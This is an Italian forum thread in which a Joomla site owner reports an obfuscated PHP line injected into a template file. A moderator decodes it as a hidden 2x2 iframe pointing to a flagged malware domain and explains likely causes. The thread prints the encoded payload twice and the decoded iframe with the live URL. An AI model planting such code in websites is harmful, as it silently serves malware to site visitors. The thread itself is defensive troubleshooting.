codice aggiunto da solo

come fa questo codice ad aggiungersi da solo?

#c3284d#
echo(gzinflate(base64_decode("3Y5BDoIwFET3JNyh+Rt0 Q6MLF0rxEl6gll/4Blvy+xG9vUVu4awmk7yZUeo/1CTHNImSz4QGBN+iH/ZltxTasuiim58YpF6YBHdVQ57tE1ViZ2AQmc5aM6Yphi7FmR2i 9+gk1RR81BRq19P1cAIVMmXgtpAIMqi8EMeRQm/AzhJB/WrvkTtkAyEHdqQ+GHB5fAUGpH4QA0dQC3UyrK5t9HanrfaXsmj 09rv9Ag==")));
#/c3284d#

l'ho trovato nella index.php del template di joomla e aggiungeva un iframe di twitter, io non l'ho messo, il punto è come ha fatto ad arrivare lì! me ne sono accorto perchè da due tre giorni il sito si vedeva male con ie ma bene con firefox e stasera ho letto il codice, cosa vedo? sta cosa che non si sa da dove è uscita...

[alemoppo]

Se ti interessa, quel codice scrive:

Codice HTML:

<script type="text/javascript">
document.write('<iframe src="http://respondsourceeffects.info/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script>

Dove quella pagina, chrome me la segnala come malaware.
Quindi l'ha messo qualche malintenzionato, molto probabilmente.

Può averlo messo:

1- sfruttando qualche bug di joomla: lo mantieni aggiornato?
2-avendoti preso la password di altervista: controlla se c'é qualche malaware nel tuo PC.

Ciao!

esatto il codice è quello postato da te in html, l'ho rimosso dall'index.php nella forma che ho scritto sopra e adesso il sito è tornato normale, ho appena cambiato in via preventiva sia le password di joomla che quelle di altervista, joomla è l'ultima versione fornita da altervista, ho usato quella installabile da pannello.

non ho malware nel pc dove tra l'altro c'è MS security essentials + firewall hardware cisco pix oltre al FW di windows percui ben protetto

ma non c'è un antivirus o altro sul dominio?

[alemoppo]

Il dominio non riescono ad entrarci, altrimenti saremmo tutti nella tua stessa situazione.
Se sei sicuro che nessuno conosce la tua password, e il pc non è infetto, allora hanno sfruttato qualche vulnerabilità di joomla... Lo mantieni aggiornato?

Ciao!

si ho già aggiornato tempo fa

Versione di Joomla! Joomla! 2.5.6 Stable [ Ember ] 19-June-2012 14:00 GMT
Versione piattaforma Joomla! Joomla Platform 11.4.0 Stable [ Brian Kernighan ] 03-Jan-2012 00:00 GMT

ho fatto a inizio luglio due accessi da pc non mio ero a lavoro, qualcosa sarà sfuggito da lì probabilmente perchè qui è tutto a posto, tengo d'occhio i log per un po e vediamo, se scopro di più scrivo qui almeno lo sappiamo tutti

Il dominio non riescono ad entrarci, altrimenti saremmo tutti nella tua stessa situazione.
Se sei sicuro che nessuno conosce la tua password, e il pc non è infetto, allora hanno sfruttato qualche vulnerabilità di joomla... Lo mantieni aggiornato?

Ciao!

scusi moderatore.. come fa a traduttre lo script dannoso ?
purtroppo ho lo stesso problema

[alemoppo]

Beh, è un sorgente PHP:

Codice PHP:

#c3284d#
echo(gzinflate(base64_decode("3Y5BDoIwFET3JNyh+Rt0 Q6MLF0rxEl6gll/4Blvy+xG9vUVu4awmk7yZUeo/1CTHNImSz4QGBN+iH/ZltxTasuiim58YpF6YBHdVQ57tE1ViZ2AQmc5aM6Yphi7FmR2i 9+gk1RR81BRq19P1cAIVMmXgtpAIMqi8EMeRQm/AzhJB/WrvkTtkAyEHdqQ+GHB5fAUGpH4QA0dQC3UyrK5t9HanrfaXsmj 09rv9Ag==")));
#/c3284d#


È criptato, ma è php. Questo significa che è criptato lato server, ma guardando sul sorgente html (del browser, per intenderci) lo script non è più criptato, perché è stato interpretato (da php, in questo caso dalla gzinflate(), e dalla base64_decode()).

Spero di essermi spiegato.

Ciao!